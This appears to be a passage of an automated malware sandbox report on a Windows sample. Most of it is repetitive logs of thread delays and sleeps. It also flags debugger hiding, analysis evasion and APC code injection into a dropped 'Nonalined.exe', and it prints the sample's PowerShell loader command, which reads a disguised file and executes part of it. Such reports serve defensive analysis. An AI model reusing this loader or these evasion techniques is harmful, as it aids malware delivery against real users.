          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeAPI/Special instruction interceptor: Address: 33B8475
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeMemory allocated: 20250000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeMemory allocated: 20050000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599563Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599342Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598759Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598654Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598542Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598427Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598093Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595966Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595808Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595694Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595577Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595031Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6677Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2986Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeWindow / User API: threadDelayed 1559Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeWindow / User API: threadDelayed 8297Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeAPI coverage: 2.5 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5548Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 964Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep count: 31 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -28592453314249787s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220Thread sleep count: 1559 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1220Thread sleep count: 8297 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599563s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599342s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599234s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599125s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -599016s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598891s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598759s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598654s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598542s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598427s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598312s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -598093s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597984s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597328s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597219s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -597094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596984s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596875s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596766s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596656s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596547s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596438s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596313s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596203s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -596094s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595966s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595808s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595694s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595577s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595469s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595359s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595250s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595141s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -595031s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594922s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594812s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594703s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594594s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe TID: 1436Thread sleep time: -594469s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C13
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040683D FindFirstFileW,FindClose,0_2_0040683D
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040290B FindFirstFileW,11_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405C13
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_0040683D FindFirstFileW,FindClose,11_2_0040683D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599563Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599342Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599125Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598891Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598759Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598654Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598542Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598427Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598312Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 598093Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597219Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596984Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596875Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596766Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596656Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 596094Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595966Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595808Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595694Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595577Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595469Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595359Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595250Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595141Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 595031Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594922Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594594Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread delayed: delay time: 594469Jump to behavior
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\jr
          Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\jr
          Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\jr
          Source: svchost.exe, 00000004.00000002.2252344812.000002527EE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251666504.0000025204455000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2251618487.0000025204441000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-4165
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeAPI call chain: ExitProcess graph end nodegraph_0-4161
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_00401C43 LdrInitializeThunk,LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW,11_2_00401C43
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Nonalined.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Nonalined.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Nonalined.exe base: 16C0000Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Heksene=gc -Raw 'C:\Users\user\AppData\Local\Skakspillene144\Anarthrously\Braiserings\Irreparabel\Prodomoi.lan';$Bastioned=$Heksene.SubString(52577,3);.$Bastioned($Heksene)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nonalined.exe "C:\Users\user\AppData\Local\Temp\Nonalined.exe"Jump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_70A01096 GetModuleFileNameW,GlobalAlloc,CharPrevW,GlobalFree,GetTempFileNameW,CopyFileW,CreateFileW,CreateFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,lstrcatW,lstrlenW,GlobalAlloc,FindWindowExW,FindWindowExW,FindWindowExW,lstrcmpiW,lstrcmpiW,lstrcmpiW,DeleteFileW,GetVersion,GlobalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoW,CreateProcessW,lstrcpyW,GetTickCount,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,GetTickCount,ReadFile,IsTextUnicode,IsDBCSLeadByteEx,MultiByteToWideChar,lstrcpyW,GlobalReAlloc,lstrcpyW,GetTickCount,TerminateProcess,lstrcpyW,Sleep,lstrcpyW,wsprintfW,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileW,GlobalFree,GlobalFree,GlobalFree,0_2_70A01096
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
